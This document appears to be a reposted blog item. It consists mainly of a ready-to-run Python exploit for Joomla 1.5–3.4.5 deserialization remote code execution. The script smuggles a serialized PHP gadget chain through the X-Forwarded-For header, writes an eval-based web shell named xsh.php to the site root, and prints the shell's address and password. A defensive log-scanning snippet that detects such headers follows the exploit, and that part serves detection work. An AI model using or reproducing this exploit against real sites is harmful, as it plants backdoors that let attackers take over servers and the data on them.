• Joomla! [1.5-3.4.5] deserialization remote code execution EXP (writes a shell directly)


    Usage: x.py http://xxx.com

    # coding=utf-8
    # author:KuuKi
    # Help: joomla 1.5-3.4.5 unserialize remote code execution

    import urllib2
    import cookielib,sys
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)
    urllib2.socket.setdefaulttimeout(10)

    payload = 'file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."xsh.php","x3C".chr(63)."@eval(x5Cx24_POST[x]);")'

    forward = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"x5C0x5C0x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:' + str(len(payload)+28) + ':"' + payload + ';JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"x5C0x5C0x5C0connection";b:1;}xF0x9Dx8Cx86'
    req = urllib2.Request(url=sys.argv[1],headers={'x-forwarded-for':forward})
    opener.open(req)
    req = urllib2.Request(url=sys.argv[1])
    if 'SimplePie_Misc::parse_url' in opener.open(req).read():
        print 'Shell: '+ sys.argv[1] + '/xsh.php Password: x'
    else:
        print 'Not vulnerable!'
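From the defender's side, the request built above stands out because its `x-forwarded-for` header is not a list of IP addresses: it carries a session-key delimiter, a serialized PHP object and a trailing four-byte UTF-8 character. The following is an added detection example, not part of the original post; the JSON log format with `src` and `xff` fields and all function names are assumptions.

```python
import ipaddress
import json
import re

# Markers taken from the x-forwarded-for value built by the script above.
SESSION_BREAKOUT = re.compile(r'\}__\w+\|')
SERIALIZED_OBJECT = re.compile(r'(?:^|[|{;}])O:\d+:"[\w\\]+":\d+:\{')
GADGET_NAMES = ("JDatabaseDriverMysqli", "JSimplepieFactory", "disconnectHandlers")

def xff_is_well_formed(value):
    """A legitimate X-Forwarded-For is a comma-separated list of IP addresses."""
    for part in value.split(","):
        try:
            ipaddress.ip_address(part.strip())
        except ValueError:
            return False
    return True

def classify(value):
    """Return the reasons a header value looks like PHP object injection."""
    reasons = []
    if SESSION_BREAKOUT.search(value):
        reasons.append("session-key breakout")
    if SERIALIZED_OBJECT.search(value):
        reasons.append("serialized PHP object")
    if any(name in value for name in GADGET_NAMES):
        reasons.append("known gadget class")
    if any(ord(ch) > 0xFFFF for ch in value):
        reasons.append("4-byte UTF-8 character")
    return reasons

def scan(lines):
    """Return (source, reasons) for every request whose XFF is not an IP list."""
    hits = []
    for line in lines:
        rec = json.loads(line)
        xff = rec.get("xff", "")
        if xff and not xff_is_well_formed(xff):
            hits.append((rec["src"], classify(xff) or ["not an IP list"]))
    return hits

# Constructed sample log lines (assumed JSON format); serialized body elided.
SAMPLE = [
    json.dumps({"src": "203.0.113.7", "xff": "198.51.100.4, 10.0.0.2"}),
    json.dumps({"src": "203.0.113.9",
                "xff": '}__test|O:21:"JDatabaseDriverMysqli":3:{...}\U0001D306'}),
]
if __name__ == "__main__":
    print(scan(SAMPLE))
```

The same `xff_is_well_formed` check can serve as a reverse-proxy or WAF rule that rejects any request whose forwarded-for header is not a plain IP list, before the value reaches session storage.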

  • Original article: https://www.cnblogs.com/milantgh/p/5193723.html